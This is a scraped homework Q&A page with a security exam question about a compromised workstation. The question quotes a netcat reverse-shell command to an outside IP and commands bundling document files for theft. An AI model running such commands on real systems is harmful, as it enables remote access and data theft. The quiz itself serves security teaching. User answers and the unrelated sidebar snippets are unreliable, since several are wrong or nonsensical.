1answer.
Ask question
Login Signup
Ask question
All categories
  • English
  • Mathematics
  • Social Studies
  • Business
  • History
  • Health
  • Geography
  • Biology
  • Physics
  • Chemistry
  • Computers and Technology
  • Arts
  • World Languages
  • Spanish
  • French
  • German
  • Advanced Placement (AP)
  • SAT
  • Medicine
  • Law
  • Engineering
Fantom [35]
4 years ago
7

A security analyst believes an employee's workstation has been compromised. The analyst reviews the system logs, but does not fi

nd any attempted logins. The analyst then runs the diff command, comparing the C:\windows\System32 directory and the installed cache directory. The Analyst finds a series of files that look suspicious.One of the files contains the following commands:Cmd /c $TEMP$\nc -e cmd.exe 34.100.43.230Copy *.doc> $TEMP$\docfiles.zipCopy *.xls> $TEMP$\xlsfiles.zipCopy *.pdf> $TEMP$\pdffiles.zipWhich of the following types of malware was used?A.WormB.SpywareC.Logic bombD.Backdoor
Computers and Technology
2 answers:
Jobisdone [24]4 years ago
5 0

Answer:

B) Spyware

Explanation:

The definition of the spyware program is a malware that collects information from a computer and then transmits this information to an external entity without the knowledge or consent of the computer owner.

Characteristics of a spyware:

  • It runs without the knowledge or authorization of the owner or user of the infected computer and performs functions on the system that are harmful to the system.
  • How to remove it? Use a reliable malware removal tool, such as the one you can find in good antimalware software.

Antimalware software:  Avast Free Antivirus, Norton, Bitdefender, Panda, Total AV, McAfee, avast, Kaspersky.

Irina18 [472]4 years ago
3 0

Answer:

B

Explanation:

nc was used to copy file

You might be interested in
Could u help me on this u just have to compare how its alike please help ​
creativ13 [48]
The phrase 'life is like a box of chocolates' means that life is unpredictable and that it is full of surprises; you never know what will happen next.
3 0
3 years ago
Read 2 more answers
int FindFirstCharFrom(char* str, char *sought); The function FindFirstCharFrom takes pointers to two C strings as arguments, str
prisoha [69]
Calculus, originally called infinitesimal calculus or "the calculus of infinitesimals", is the mathematical study of continuous change, in the same way that geometry is the study of shape and algebra is the study of generalizations of arithmetic operations.djdjdjdjdjjswhd
5 0
3 years ago
What is the biggest type of gear?<br><br>A. Spur<br>B.Worm<br>C.Wheel<br>D.Pinion
AnnZ [28]
The answer to this should be B. Worm. A pinion is a the smallest gear out of the listed ones above. spur would be next then wheel and the biggest if them all would be the spur. I'm not completely sure if my answer is 100% correct, but I feel confident enough about it. Hope this helps. :)

7 0
3 years ago
Read 2 more answers
Staff in several departments interact with the order processing system and will be affected by any
PIT_PIT [208]

Answer:

Tasha should gather ideas from her team to build the network.

Explanation:

Network allows the user to connect on one platform. Tasha has decided to create a network which will enable large number users to be connected on single network and every employee will be able to perform its normal operations remotely.

5 0
3 years ago
Why do primitive types have ranges of values? what determines the range of the data type?
Alexxx [7]
What determines the range of primitive data types is a combination of the number of bytes that is allocated to them and if there's any encoding.

Not too long ago, it was normal for an integer to receive four bytes of memory. An unsigned integer would also receive four bytes of memory. The unsigned int  had a range of 0 - (2^32 - 1) because it could only be used for positive integers and could use all 32 bits. An integer has a range of (- 2^31 through +2^31 - 1). The 32nd bit is uses as a sign bit (0 for positive, 1 for negative).

Just for thoroughness: when an int is negative, it's stored as the two's complement of it's absolute value.
5 0
3 years ago
Other questions:
  • The opening of the throttle plate can be delayed as long as
    13·1 answer
  • Where does the VLookup function find its lookup values?
    14·1 answer
  • _______ tags are tiny chips that can be embedded into almost anything and contain information used to track and locate lost pets
    14·1 answer
  • You want to average the numbers in the range b1:b30. you have named this range of cells data and wish to use this range name in
    9·1 answer
  • How can we lock pubg game from Play Store???​
    12·2 answers
  • In checking the digital signature, the verifier ____. a. decrypts the digital signature it received with the supplicant public k
    13·1 answer
  • Help me asap please
    15·1 answer
  • I'll give brainlyist
    9·2 answers
  • বর্তমান করােনার ন্যায় পরিস্থিতি অর্থাৎ স্বাভাবিক শ্রেণি কার্যক্রম পরিচালনা সম্ভব
    10·2 answers
  • Add criteria to this query to return only the records where the value in the SubscriptionType field is Self or Family and the va
    12·1 answer
Add answer
Login
Not registered? Fast signup
Signup
Login Signup
Ask question!